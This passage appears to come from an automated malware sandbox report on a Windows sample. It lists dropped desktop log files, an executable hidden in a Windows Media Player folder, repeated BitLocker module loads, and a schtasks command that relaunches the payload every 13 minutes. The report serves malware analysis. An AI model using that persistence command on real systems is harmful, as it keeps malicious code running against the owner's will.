                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\LBbeHZkL.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\uuKznmFw.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\OlTNIjCM.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\WgiUHyMw.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mHfKTHWS.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\FQiXIcGc.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\ucDhZRLu.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mzvrpXvN.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\dVnCFeff.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\ThILVSlx.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\BargBgFj.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\bcXTThuh.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\KVHoAvPS.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\zhcyQjUk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\pyJigHPD.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\gPpSweJV.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\XmhcMluo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kOdTVPKT.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\ZrGvzZJn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QImfPxDF.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\WBPEscIu.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\swyioMDw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RGOnlxSA.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pKSShysD.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\NPXweASH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SDpvGwhv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BwYQnKCg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\rNFADhxz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BnpyIbbb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\yUQAQjKk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\exStwvKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\sTDIJUfq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\XQlMiBJi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\EEJGOfpT.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\lnWbuaeE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\LCxGrujI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kHClnwJL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\npJJQJjz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\UXWdwFYk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\EVQZcBiW.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RmrNprNr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\AfaiVEic.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QNGyvuni.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\sRYTiegb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pHCSiMBb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QWdyfgGf.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\FizIvULx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\wFqSLbvP.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\MgnHXjFm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SYQgAPKa.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\udiCoAET.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kuPmEXym.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\bQGwUejE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SingkCdX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QXRfkjyW.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\xLpaQOdH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\TfOoGCsS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\IrkyWqxk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jGLeSKCo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QujYzohZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\FAtHPtxq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\tmGCYmXQ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jybLobci.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\HDgqkcCm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\qwPLRqWX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\XjnFxUBI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\VZRFxCWH.logJump to dropped file

                          Boot Survival

                          barindex
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
